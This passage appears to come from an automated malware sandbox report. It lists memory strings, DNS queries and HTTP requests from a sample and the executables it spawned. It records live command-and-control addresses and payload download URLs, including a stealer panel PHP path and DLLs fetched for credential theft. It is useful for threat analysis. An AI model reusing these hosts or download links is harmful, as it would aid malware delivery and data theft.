data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.3002770667.000001E764EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 5e28f62265.exe, 0000000E.00000002.2872503663.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/videoCS_removeLogEventListenerbrowsing-context-discardedPREF_BRANCH_WAS_REGISTEREDIDB_MIGRATE_RESULT_HISTOGRAM equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/video`^U equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.comZ equals www.facebook.com (Facebook)
Source: 5e28f62265.exe, 0000000E.00000003.2836170550.0000000000854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: illa Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.2839804513.000001E3C87AD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2844813161.000001E3C87B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: osk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2846485551.000001E3C8A74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2843256720.000001E3C8A73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s--kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevationUser equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: webIsolated=https://facebook.comhttps://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3002770667.000001E764EB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997633717.000001E763CAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com_ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2995380035.000001E7639A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997633717.000001E763C32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E7639D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store

Source: firefox.exe, 0000001D.00000002.2983794051.000001E7627A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3030925786.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/9
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/=C
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/R
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/U
Source: e192e43b61.exe, 0000000B.00000002.3033486793.0000000001467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/_
Source: e192e43b61.exe, 0000000B.00000002.3032149823.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/c
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/g
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/k
Source: e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeL
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000002.3032979304.0000000001104000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: e192e43b61.exe, 0000000A.00000002.3013027936.000000000084A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe.exe
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe0
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeF
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exee
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exev
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe:
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeencoded
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/t
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/mine/random.exe
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206-u
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.000000000143E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/freebl3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/mozglue.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/msvcp140.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/msvcp140.dlll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/nss3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/nss3.dllK
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/softokn3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/sqlite3.dllo
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/sqlite3.dlls
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/vcruntime140.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/vcruntime140.dllTemp
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/1
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/L
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.000000000143E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/a
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php)
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.0000000001933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php2
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php7
